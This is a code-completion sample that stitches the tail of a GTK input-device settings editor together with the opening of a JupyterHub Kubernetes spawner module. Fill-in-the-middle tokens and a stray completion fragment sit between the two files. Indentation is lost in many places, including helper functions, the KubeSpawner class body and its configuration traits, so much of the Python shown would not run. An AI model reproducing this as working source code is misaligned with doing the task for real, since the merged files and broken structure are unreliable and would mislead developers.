        device_iter = self._devices_store.get_iter(device_path_str)
        device = self._devices_store.get_value(device_iter, 0)
        settings = self._monitor.get_device_settings(device)
        if not settings:
            return
        settings.usage = config
        self._devices_view.columns_autosize()

    def _scroll_cell_changed_cb(self, conf_combo, device_path_str,
                                conf_iter, *etc):
        # Persist the new scroll-action choice.
        conf_store = self._scroll_store
        conf_col = self._SCROLL_CONFIG_COL
        conf_value = conf_store.get_value(conf_iter, conf_col)
        device_store = self._devices_store
        device_iter = device_store.get_iter(device_path_str)
        device = device_store.get_value(device_iter, 0)
        settings = self._monitor.get_device_settings(device)
        if not settings:
            return
        settings.scroll = conf_value
        self._devices_view.columns_autosize()

    def _update_devices_store(self, *_ignored):
        """Repopulates the displayed list"""
        updated_list = list(self._monitor.get_devices())
        updated_list_map = dict(updated_list)
        paths_for_removal = []
        devices_retained = set()
        for row in self._devices_store:
            device, = row
            if device not in updated_list_map:
                paths_for_removal.append(row.path)
                continue
            devices_retained.add(device)
        for device, config in updated_list:
            if device in devices_retained:
                continue
            self._devices_store.append([device])
        # Remove in reverse so earlier paths stay valid while deleting.
        for unwanted_row_path in reversed(paths_for_removal):
            unwanted_row_iter = self._devices_store.get_iter(unwanted_row_path)
            self._devices_store.remove(unwanted_row_iter)
        self._devices_view.queue_draw()
## Helper funcs
def _device_prefs_key(device):
"""Returns the subkey to use in the app prefs for a device"""
source = device.get_source()
name = device.get_name()
n_axes = device.get_n_axes()
return u"%s:%s:%d" % (name, source.value_nick, n_axes)
def device_is_eraser(device):
    """Tests whether a device appears to be an eraser

    :param device: a Gdk.Device, or None
    :returns: True if the device reports the ERASER source, or its
        name contains the word "eraser" (case-insensitive).
    """
    if device is None:
        return False
    if device.get_source() == Gdk.InputSource.ERASER:
        return True
    # FIX: the original pattern was r'\<eraser\>', which uses GNU-regex
    # word boundaries. Python's `re` treats \< and \> as literal angle
    # brackets, so the check could only match names containing the
    # literal text "<eraser>". \b is the Python equivalent, and it also
    # matches any such literal occurrence, so this is a strict superset.
    if re.search(r'\beraser\b', device.get_name(), re.I):
        return True
    return False
## Testing
def _test():
    """Interactive UI testing for SettingsEditor and Monitor"""
    logging.basicConfig(level=logging.DEBUG)
    win = Gtk.Window()
    win.set_title("gui.device.SettingsEditor")
    win.set_default_size(500, 400)
    win.connect("destroy", Gtk.main_quit)
    # app=None: the Monitor keeps settings in an in-memory dict instead
    # of the application's persistent prefs.
    monitor = Monitor(app=None)
    editor = SettingsEditor(monitor)
    win.add(editor)
    win.show_all()
    Gtk.main()
    # Dump whatever settings were accumulated once the window closes.
    print(monitor._prefs)
if __name__ == '__main__':
_test()<|fim▁end|> | settings = Settings(dev_prefs)
self._device_settings[device] = settings
self.devices_updated()
assert settings is not None |
<|file_name|>spawner.py<|end_file_name|><|fim▁begin|>"""
JupyterHub Spawner to spawn user notebooks on a Kubernetes cluster.
This module exports `KubeSpawner` class, which is the actual spawner
implementation that should be used by JupyterHub.
"""
import asyncio
import os
import signal
import string
import sys
import warnings
from functools import partial
from functools import wraps
from urllib.parse import urlparse
import escapism
from jinja2 import BaseLoader
from jinja2 import Environment
from jupyterhub.spawner import Spawner
from jupyterhub.traitlets import Command
from jupyterhub.utils import exponential_backoff
from kubernetes_asyncio import client
from kubernetes_asyncio.client.rest import ApiException
from slugify import slugify
from tornado import gen
from traitlets import Bool
from traitlets import default
from traitlets import Dict
from traitlets import Integer
from traitlets import List
from traitlets import observe
from traitlets import Unicode
from traitlets import Union
from traitlets import validate
from .clients import load_config
from .clients import shared_client
from .objects import make_namespace
from .objects import make_owner_reference
from .objects import make_pod
from .objects import make_pvc
from .objects import make_secret
from .objects import make_service
from .reflector import ResourceReflector
from .traitlets import Callable
class PodReflector(ResourceReflector):
    """
    PodReflector is merely a configured ResourceReflector. It exposes
    the pods property, which is simply mapping to self.resources where the
    ResourceReflector keeps an updated list of the resource defined by
    the `kind` field and the `list_method_name` field.
    """

    kind = "pods"

    # The default component label can be over-ridden by specifying the component_label property
    # (this default matches KubeSpawner.component_label's default value).
    labels = {
        'component': 'singleuser-server',
    }

    @property
    def pods(self):
        """
        A dictionary of pods for the namespace as returned by the Kubernetes
        API. The dictionary keys are the pod ids and the values are
        dictionaries of the actual pod resource values.

        ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#pod-v1-core
        """
        return self.resources
class EventReflector(ResourceReflector):
    """
    EventsReflector is merely a configured ResourceReflector. It
    exposes the events property, which is simply mapping to self.resources where
    the ResourceReflector keeps an updated list of the resource
    defined by the `kind` field and the `list_method_name` field.
    """

    kind = "events"

    @property
    def events(self):
        """
        Returns list of dictionaries representing the k8s
        events within the namespace, sorted by the latest event.

        ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
        """

        def _event_time(event):
            # Each event carries either lastTimestamp (low resolution)
            # or eventTime (high resolution); both serve the same role,
            # so whichever is set is used for chronological ordering.
            return event["lastTimestamp"] or event["eventTime"]

        # self.resources is a dict keyed by unique event ids, updated
        # (and occasionally wholly refreshed) by ResourceReflector, so
        # its values carry no ordering guarantee of their own. Sort them
        # before handing the list to callers.
        return sorted(self.resources.values(), key=_event_time)
class MockObject(object):
    """Empty attribute container; stands in for user/hub objects in tests
    (see KubeSpawner.__init__'s _mock branch)."""
    pass
class KubeSpawner(Spawner):
"""
A JupyterHub spawner that spawn pods in a Kubernetes Cluster. Each server
spawned by a user will have its own KubeSpawner instance.
"""
reflectors = {
"pods": None,
"events": None,
}
# Characters as defined by safe for DNS
# Note: '-' is not in safe_chars, as it is being used as escape character
safe_chars = set(string.ascii_lowercase + string.digits)
    @property
    def pod_reflector(self):
        """
        A convenience alias to the class variable reflectors['pods'].

        Note: class-level, so the reflector is shared by all spawner
        instances of this class.
        """
        return self.__class__.reflectors['pods']
    @property
    def event_reflector(self):
        """
        A convenience alias to the class variable reflectors['events'] if the
        spawner instance has events_enabled.

        Implicitly returns None when events_enabled is False; callers
        must handle that case.
        """
        if self.events_enabled:
            return self.__class__.reflectors['events']
    def __init__(self, *args, **kwargs):
        """Set up the spawner for one user server.

        :param _mock: keyword-only flag (popped before the superclass
            sees it); when True, ``self.user``/``self.hub`` are stubbed
            with MockObject instances for test runs.
        """
        _mock = kwargs.pop('_mock', False)
        super().__init__(*args, **kwargs)
        if _mock:
            # runs during test execution only
            if 'user' not in kwargs:
                user = MockObject()
                user.name = 'mock_name'
                user.id = 'mock_id'
                user.url = 'mock_url'
                self.user = user
            if 'hub' not in kwargs:
                hub = MockObject()
                hub.public_host = 'mock_public_host'
                hub.url = 'mock_url'
                hub.base_url = 'mock_base_url'
                hub.api_url = 'mock_api_url'
                self.hub = hub
        # We have to set the namespace (if user namespaces are enabled)
        # before we start the reflectors, so this must run before
        # watcher start in normal execution. We still want to get the
        # namespace right for test, though, so we need self.user to have
        # been set in order to do that.
        # By now, all the traitlets have been set, so we can use them to
        # compute other attributes
        if self.enable_user_namespaces:
            self.namespace = self._expand_user_properties(self.user_namespace_template)
            self.log.info("Using user namespace: {}".format(self.namespace))
        # Derive per-server resource names from the templates.
        self.pod_name = self._expand_user_properties(self.pod_name_template)
        self.dns_name = self.dns_name_template.format(
            namespace=self.namespace, name=self.pod_name
        )
        self.secret_name = self._expand_user_properties(self.secret_name_template)
        self.pvc_name = self._expand_user_properties(self.pvc_name_template)
        if self.working_dir:
            self.working_dir = self._expand_user_properties(self.working_dir)
        if self.port == 0:
            # Our default port is 8888
            self.port = 8888
        # The attribute needs to exist, even though it is unset to start with
        self._start_future = None
        # Configure the shared kubernetes client before first use.
        load_config(host=self.k8s_api_host, ssl_ca_cert=self.k8s_api_ssl_ca_cert)
        self.api = shared_client("CoreV1Api")
        # NOTE(review): _start_watching_pods/_start_watching_events are
        # defined later in the file; presumably they populate the
        # class-level `reflectors` registry — confirm against full file.
        self._start_watching_pods()
        if self.events_enabled:
            self._start_watching_events()
    def _await_pod_reflector(method):
        """Decorator to wait for pod reflector to load

        Apply to methods which require the pod reflector
        to have completed its first load of pods.

        Evaluated at class-definition time (hence no `self` argument:
        `method` is the undecorated function; `self` is bound when the
        returned coroutine wrapper runs).
        """

        @wraps(method)
        async def async_method(self, *args, **kwargs):
            if not self.pod_reflector.first_load_future.done():
                await self.pod_reflector.first_load_future
            return await method(self, *args, **kwargs)

        return async_method
    def _await_event_reflector(method):
        """Decorator to wait for event reflector to load

        Apply to methods which require the event reflector
        to have completed its first load of events.

        No-op when events_enabled is False (the event reflector is then
        never consulted).
        """

        @wraps(method)
        async def async_method(self, *args, **kwargs):
            if (
                self.events_enabled
                and not self.event_reflector.first_load_future.done()
            ):
                await self.event_reflector.first_load_future
            return await method(self, *args, **kwargs)

        return async_method
k8s_api_ssl_ca_cert = Unicode(
"",
config=True,
help="""
Location (absolute filepath) for CA certs of the k8s API server.
Typically this is unnecessary, CA certs are picked up by
config.load_incluster_config() or config.load_kube_config.
In rare non-standard cases, such as using custom intermediate CA
for your cluster, you may need to mount root CA's elsewhere in
your Pod/Container and point this variable to that filepath
""",
)
k8s_api_host = Unicode(
"",
config=True,
help="""
Full host name of the k8s API server ("https://hostname:port").
Typically this is unnecessary, the hostname is picked up by
config.load_incluster_config() or config.load_kube_config.
""",
)
k8s_api_threadpool_workers = Integer(
config=True,
help="""
DEPRECATED in KubeSpawner 3.0.0.
No longer has any effect, as there is no threadpool anymore.
""",
)
k8s_api_request_timeout = Integer(
3,
config=True,
help="""
API request timeout (in seconds) for all k8s API calls.
This is the total amount of time a request might take before the connection
is killed. This includes connection time and reading the response.
NOTE: This is currently only implemented for creation and deletion of pods,
and creation of PVCs.
""",
)
k8s_api_request_retry_timeout = Integer(
30,
config=True,
help="""
Total timeout, including retry timeout, for kubernetes API calls
When a k8s API request connection times out, we retry it while backing
off exponentially. This lets you configure the total amount of time
we will spend trying an API request - including retries - before
giving up.
""",
)
events_enabled = Bool(
True,
config=True,
help="""
Enable event-watching for progress-reports to the user spawn page.
Disable if these events are not desirable
or to save some performance cost.
""",
)
enable_user_namespaces = Bool(
False,
config=True,
help="""
Cause each user to be spawned into an individual namespace.
This comes with some caveats. The Hub must run with significantly
more privilege (must have ClusterRoles analogous to its usual Roles)
and can therefore do heinous things to the entire cluster.
It will also make the Reflectors aware of pods and events across
all namespaces. This will have performance implications, although
using labels to restrict resource selection helps somewhat.
If you use this, consider cleaning up the user namespace in your
post_stop_hook.
""",
)
user_namespace_template = Unicode(
"{hubnamespace}-{username}",
config=True,
help="""
Template to use to form the namespace of user's pods (only if
enable_user_namespaces is True).
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
namespace = Unicode(
config=True,
help="""
Kubernetes namespace to spawn user pods in.
Assuming that you are not running with enable_user_namespaces
turned on, if running inside a kubernetes cluster with service
accounts enabled, defaults to the current namespace, and if not,
defaults to `default`.
If you are running with enable_user_namespaces, this parameter
is ignored in favor of the `user_namespace_template` template
resolved with the hub namespace and the user name, with the
caveat that if the hub namespace is `default` the user
namespace will have the prefix `user` rather than `default`.
""",
)
@default('namespace')
def _namespace_default(self):
"""
Set namespace default to current namespace if running in a k8s cluster
If not in a k8s cluster with service accounts enabled, default to
`default`
"""
ns_path = '/var/run/secrets/kubernetes.io/serviceaccount/namespace'
if os.path.exists(ns_path):
with open(ns_path) as f:
return f.read().strip()
return 'default'
ip = Unicode(
'0.0.0.0',
config=True,
help="""
The IP address (or hostname) the single-user server should listen on.
We override this from the parent so we can set a more sane default for
the Kubernetes setup.
""",
)
cmd = Command(
None,
allow_none=True,
minlen=0,
config=True,
help="""
The command used to start the single-user server.
Either
- a string containing a single command or path to a startup script
- a list of the command and arguments
- `None` (default) to use the Docker image's `CMD`
If `cmd` is set, it will be augmented with `spawner.get_args(). This will override the `CMD` specified in the Docker image.
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
working_dir = Unicode(
None,
allow_none=True,
config=True,
help="""
The working directory where the Notebook server will be started inside the container.
Defaults to `None` so the working directory will be the one defined in the Dockerfile.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
service_account = Unicode(
None,
allow_none=True,
config=True,
help="""
The service account to be mounted in the spawned user pod.
The token of the service account is NOT mounted by default.
This makes sure that we don't accidentally give access to the whole
kubernetes API to the users in the spawned pods.
Set automount_service_account_token True to mount it.
This `serviceaccount` must already exist in the namespace the user pod is being spawned in.
""",
)
automount_service_account_token = Bool(
None,
allow_none=True,
config=True,
help="""
Whether to mount the service account token in the spawned user pod.
The default value is None, which mounts the token if the service account is explicitly set,
but doesn't mount it if not.
WARNING: Be careful with this configuration! Make sure the service account being mounted
has the minimal permissions needed, and nothing more. When misconfigured, this can easily
give arbitrary users root over your entire cluster.
""",
)
dns_name_template = Unicode(
"{name}.{namespace}.svc.cluster.local",
config=True,
help="""
Template to use to form the dns name for the pod.
""",
)
pod_name_template = Unicode(
'jupyter-{username}--{servername}',
config=True,
help="""
Template to use to form the name of user's pods.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
Trailing `-` characters are stripped for safe handling of empty server names (user default servers).
This must be unique within the namespace the pods are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
.. versionchanged:: 0.12
`--` delimiter added to the template,
where it was implicitly added to the `servername` field before.
Additionally, `username--servername` delimiter was `-` instead of `--`,
allowing collisions in certain circumstances.
""",
)
pod_connect_ip = Unicode(
config=True,
help="""
The IP address (or hostname) of user's pods which KubeSpawner connects to.
If you do not specify the value, KubeSpawner will use the pod IP.
e.g. 'jupyter-{username}--{servername}.notebooks.jupyterhub.svc.cluster.local',
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
Trailing `-` characters in each domain level are stripped for safe handling of empty server names (user default servers).
This must be unique within the namespace the pods are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
""",
)
storage_pvc_ensure = Bool(
False,
config=True,
help="""
Ensure that a PVC exists for each user before spawning.
Set to true to create a PVC named with `pvc_name_template` if it does
not exist for the user when their pod is spawning.
""",
)
delete_pvc = Bool(
True,
config=True,
help="""Delete PVCs when deleting Spawners.
When a Spawner is deleted (not just stopped),
delete its associated PVC.
This occurs when a named server is deleted,
or when the user itself is deleted for the default Spawner.
Requires JupyterHub 1.4.1 for Spawner.delete_forever support.
.. versionadded: 0.17
""",
)
pvc_name_template = Unicode(
'claim-{username}--{servername}',
config=True,
help="""
Template to use to form the name of user's pvc.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
Trailing `-` characters are stripped for safe handling of empty server names (user default servers).
This must be unique within the namespace the pvc are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
.. versionchanged:: 0.12
`--` delimiter added to the template,
where it was implicitly added to the `servername` field before.
Additionally, `username--servername` delimiter was `-` instead of `--`,
allowing collisions in certain circumstances.
""",
)
component_label = Unicode(
'singleuser-server',
config=True,
help="""
The component label used to tag the user pods. This can be used to override
the spawner behavior when dealing with multiple hub instances in the same
namespace. Usually helpful for CI workflows.
""",
)
secret_name_template = Unicode(
'jupyter-{username}{servername}',
config=True,
help="""
Template to use to form the name of user's secret.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
This must be unique within the namespace the pvc are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
""",
)
secret_mount_path = Unicode(
"/etc/jupyterhub/ssl/",
allow_none=False,
config=True,
help="""
Location to mount the spawned pod's certificates needed for internal_ssl functionality.
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
hub_connect_ip = Unicode(
allow_none=True,
config=True,
help="""DEPRECATED. Use c.JupyterHub.hub_connect_ip""",
)
hub_connect_port = Integer(
config=True, help="""DEPRECATED. Use c.JupyterHub.hub_connect_url"""
)
@observe('hub_connect_ip', 'hub_connect_port')
def _deprecated_changed(self, change):
    # Forward writes to the deprecated KubeSpawner.hub_connect_* traits to
    # the corresponding attribute on the JupyterHub `hub` object
    # (e.g. hub_connect_ip -> self.hub.connect_ip), warning each time.
    warnings.warn(
        """
        KubeSpawner.{0} is deprecated with JupyterHub >= 0.8.
        Use JupyterHub.{0}
        """.format(
            change.name
        ),
        DeprecationWarning,
    )
    # split('_', 1)[1] strips the leading "hub_" to get the hub attribute name
    setattr(self.hub, change.name.split('_', 1)[1], change.new)
common_labels = Dict(
{
'app': 'jupyterhub',
'heritage': 'jupyterhub',
},
config=True,
help="""
Kubernetes labels that both spawned singleuser server pods and created
user PVCs will get.
Note that these are only set when the Pods and PVCs are created, not
later when this setting is updated.
""",
)
extra_labels = Dict(
config=True,
help="""
Extra kubernetes labels to set on the spawned single-user pods, as well
as on the pods' associated k8s Service and k8s Secret if internal_ssl is
enabled.
The keys and values specified here would be set as labels on the spawned single-user
kubernetes pods. The keys and values must both be strings that match the kubernetes
label key / value constraints.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/>`__
for more info on what labels are and why you might want to use them!
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
extra_annotations = Dict(
config=True,
help="""
Extra Kubernetes annotations to set on the spawned single-user pods, as
well as on the pods' associated k8s Service and k8s Secret if
internal_ssl is enabled.
The keys and values specified here are added as annotations on the spawned single-user
kubernetes pods. The keys and values must both be strings.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/overview/working-with-objects/annotations/>`__
for more info on what annotations are and why you might want to use them!
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
image = Unicode(
'jupyterhub/singleuser:latest',
config=True,
help="""
Docker image to use for spawning user's containers.
Defaults to `jupyterhub/singleuser:latest`
Name of the container + a tag, same as would be used with
a `docker pull` command. If tag is set to `latest`, kubernetes will
check the registry each time a new user is spawned to see if there
is a newer image available. If available, new image will be pulled.
Note that this could cause long delays when spawning, especially
if the image is large. If you do not specify a tag, whatever version
of the image is first pulled on the node will be used, thus possibly
leading to inconsistent images on different nodes. For all these
reasons, it is recommended to specify a specific immutable tag
for the image.
If your image is very large, you might need to increase the timeout
for starting the single user container from the default. You can
set this with::
c.KubeSpawner.start_timeout = 60 * 5 # Up to 5 minutes
""",
)
image_pull_policy = Unicode(
'IfNotPresent',
config=True,
help="""
The image pull policy of the docker container specified in
`image`.
Defaults to `IfNotPresent` which causes the Kubelet to NOT pull the image
specified in KubeSpawner.image if it already exists, except if the tag
is `:latest`. For more information on image pull policy,
refer to `the Kubernetes documentation <https://kubernetes.io/docs/concepts/containers/images/>`__.
This configuration is primarily used in development if you are
actively changing the `image_spec` and would like to pull the image
whenever a user container is spawned.
""",
)
image_pull_secrets = Union(
trait_types=[
List(),
Unicode(),
],
config=True,
help="""
A list of references to Kubernetes Secret resources with credentials to
pull images from image registries. This list can either have strings in
it or objects with the string value nested under a name field.
Passing a single string is still supported, but deprecated as of
KubeSpawner 0.14.0.
See `the Kubernetes documentation
<https://kubernetes.io/docs/concepts/containers/images/#specifying-imagepullsecrets-on-a-pod>`__
for more information on when and why this might need to be set, and what
it should be set to.
""",
)
@validate('image_pull_secrets')
def _validate_image_pull_secrets(self, proposal):
    """Normalize `image_pull_secrets` to the list form.

    A bare string value (deprecated since KubeSpawner 0.14.0) is wrapped
    into ``[{"name": <value>}]`` after emitting a DeprecationWarning;
    list values are passed through unchanged.
    """
    # isinstance (rather than `type(...) == str`) is the idiomatic check and
    # also normalizes str subclasses correctly.
    if isinstance(proposal['value'], str):
        warnings.warn(
            """Passing KubeSpawner.image_pull_secrets string values is
            deprecated since KubeSpawner 0.14.0. The recommended
            configuration is now a list of either strings or dictionary
            objects with the string referencing the Kubernetes Secret name
            in under the value of the dictionary's name key.""",
            DeprecationWarning,
        )
        return [{"name": proposal['value']}]

    return proposal['value']
node_selector = Dict(
config=True,
help="""
The dictionary Selector labels used to match the Nodes where Pods will be launched.
Default is None and means it will be launched in any available Node.
For example to match the Nodes that have a label of `disktype: ssd` use::
c.KubeSpawner.node_selector = {'disktype': 'ssd'}
""",
)
uid = Union(
trait_types=[
Integer(),
Callable(),
],
default_value=None,
allow_none=True,
config=True,
help="""
The UID to run the single-user server containers as.
This UID should ideally map to a user that already exists in the container
image being used. Running as root is discouraged.
Instead of an integer, this could also be a callable that takes as one
parameter the current spawner instance and returns an integer. The callable
will be called asynchronously if it returns a future. Note that
the interface of the spawner class is not deemed stable across versions,
so using this functionality might cause your JupyterHub or kubespawner
upgrades to break.
If set to `None`, the user specified with the `USER` directive in the
container metadata is used.
""",
)
gid = Union(
trait_types=[
Integer(),
Callable(),
],
default_value=None,
allow_none=True,
config=True,
help="""
The GID to run the single-user server containers as.
This GID should ideally map to a group that already exists in the container
image being used. Running as root is discouraged.
Instead of an integer, this could also be a callable that takes as one
parameter the current spawner instance and returns an integer. The callable
will be called asynchronously if it returns a future. Note that
the interface of the spawner class is not deemed stable across versions,
so using this functionality might cause your JupyterHub or kubespawner
upgrades to break.
If set to `None`, the group of the user specified with the `USER` directive
in the container metadata is used.
""",
)
fs_gid = Union(
trait_types=[
Integer(),
Callable(),
],
default_value=None,
allow_none=True,
config=True,
help="""
The GID of the group that should own any volumes that are created & mounted.
A special supplemental group that applies primarily to the volumes mounted
in the single-user server. In volumes from supported providers, the following
things happen:
1. The owning GID will be the this GID
2. The setgid bit is set (new files created in the volume will be owned by
this GID)
3. The permission bits are OR’d with rw-rw
The single-user server will also be run with this gid as part of its supplemental
groups.
Instead of an integer, this could also be a callable that takes as one
parameter the current spawner instance and returns an integer. The callable will
be called asynchronously if it returns a future, rather than an int. Note that
the interface of the spawner class is not deemed stable across versions,
so using this functionality might cause your JupyterHub or kubespawner
upgrades to break.
You'll *have* to set this if you are using auto-provisioned volumes with most
cloud providers. See `fsGroup <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podsecuritycontext-v1-core>`__
for more details.
""",
)
supplemental_gids = Union(
trait_types=[
List(),
Callable(),
],
config=True,
help="""
A list of GIDs that should be set as additional supplemental groups to the
user that the container runs as.
Instead of a list of integers, this could also be a callable that takes as one
parameter the current spawner instance and returns a list of integers. The
callable will be called asynchronously if it returns a future, rather than
a list. Note that the interface of the spawner class is not deemed stable
across versions, so using this functionality might cause your JupyterHub
or kubespawner upgrades to break.
You may have to set this if you are deploying to an environment with RBAC/SCC
enforced and pods run with a 'restricted' SCC which results in the image being
run as an assigned user ID. The supplemental group IDs would need to include
the corresponding group ID of the user ID the image normally would run as. The
image must setup all directories/files any application needs access to, as group
writable.
""",
)
privileged = Bool(
False,
config=True,
help="""
Whether to run the pod with a privileged security context.
""",
)
allow_privilege_escalation = Bool(
False,
allow_none=True,
config=True,
help="""
Controls whether a process can gain more privileges than its parent process.
When set to False (the default), the primary user visible effect is that
setuid binaries (like sudo) will no longer work.
When set to None, the defaults for the cluster are respected.
This bool directly controls whether the no_new_privs flag gets set on the container
AllowPrivilegeEscalation is true always when the container is:
1) run as Privileged OR 2) has CAP_SYS_ADMIN.
""",
)
container_security_context = Union(
trait_types=[
Dict(),
Callable(),
],
config=True,
help="""
A Kubernetes security context for the container. Note that all
configuration options within here should be camelCased.
What is configured here has the highest priority, so the alternative
configuration `uid`, `gid`, `privileged`, and
`allow_privilege_escalation` will be overridden by this.
Rely on `the Kubernetes reference
<https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#securitycontext-v1-core>`__
for details on allowed configuration.
""",
)
pod_security_context = Union(
trait_types=[
Dict(),
Callable(),
],
config=True,
help="""
A Kubernetes security context for the pod. Note that all configuration
options within here should be camelCased.
What is configured here has higher priority than `fs_gid` and
`supplemental_gids`, but lower priority than what is set in the
`container_security_context`.
Note that anything configured on the Pod level will influence all
containers, including init containers and sidecar containers.
Rely on `the Kubernetes reference
<https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podsecuritycontext-v1-core>`__
for details on allowed configuration.
""",
)
modify_pod_hook = Callable(
None,
allow_none=True,
config=True,
help="""
Callable to augment the Pod object before launching.
Expects a callable that takes two parameters:
1. The spawner object that is doing the spawning
2. The Pod object that is to be launched
You should modify the Pod object and return it.
This can be a coroutine if necessary. When set to none, no augmenting is done.
This is very useful if you want to modify the pod being launched dynamically.
Note that the spawner object can change between versions of KubeSpawner and JupyterHub,
so be careful relying on this!
""",
)
volumes = List(
config=True,
help="""
List of Kubernetes Volume specifications that will be mounted in the user pod.
This list will be directly added under `volumes` in the kubernetes pod spec,
so you should use the same structure. Each item in the list must have the
following two keys:
- `name`
Name that'll be later used in the `volume_mounts` config to mount this
volume at a specific path.
- `<name-of-a-supported-volume-type>` (such as `hostPath`, `persistentVolumeClaim`,
etc)
The key name determines the type of volume to mount, and the value should
be an object specifying the various options available for that kind of
volume.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/volumes>`__
for more information on the various kinds of volumes available and their options.
Your kubernetes cluster must already be configured to support the volume types you want to use.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
volume_mounts = List(
config=True,
help="""
List of paths on which to mount volumes in the user notebook's pod.
This list will be added to the values of the `volumeMounts` key under the user's
container in the kubernetes pod spec, so you should use the same structure as that.
Each item in the list should be a dictionary with at least these two keys:
- `mountPath` The path on the container in which we want to mount the volume.
- `name` The name of the volume we want to mount, as specified in the `volumes` config.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/volumes>`__
for more information on how the `volumeMount` item works.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
storage_capacity = Unicode(
None,
config=True,
allow_none=True,
help="""
The amount of storage space to request from the volume that the pvc will
mount to. This amount will be the amount of storage space the user has
to work with on their notebook. If left blank, the kubespawner will not
create a pvc for the pod.
This will be added to the `resources: requests: storage:` in the k8s pod spec.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/persistent-volumes/#persistentvolumeclaims>`__
for more information on how storage works.
Quantities can be represented externally as unadorned integers, or as fixed-point
integers with one of these SI suffices (`E, P, T, G, M, K, m`) or their power-of-two
equivalents (`Ei, Pi, Ti, Gi, Mi, Ki`). For example, the following represent roughly
the same value: `128974848`, `129e6`, `129M`, `123Mi`.
""",
)
storage_extra_labels = Dict(
config=True,
help="""
Extra kubernetes labels to set on the user PVCs.
The keys and values specified here would be set as labels on the PVCs
created by kubespawner for the user. Note that these are only set
when the PVC is created, not later when this setting is updated.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/>`__
for more info on what labels are and why you might want to use them!
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
storage_class = Unicode(
None,
config=True,
allow_none=True,
help="""
The storage class that the pvc will use.
This will be added to the `annotations: volume.beta.kubernetes.io/storage-class:`
in the pvc metadata.
This will determine what type of volume the pvc will request to use. If one exists
that matches the criteria of the StorageClass, the pvc will mount to that. Otherwise,
b/c it has a storage class, k8s will dynamically spawn a pv for the pvc to bind to
and a machine in the cluster for the pv to bind to.
Note that an empty string is a valid value and is always interpreted to be
requesting a pv with no class.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/storage-classes/>`__
for more information on how StorageClasses work.
""",
)
storage_access_modes = List(
["ReadWriteOnce"],
config=True,
help="""
List of access modes the user has for the pvc.
The access modes are:
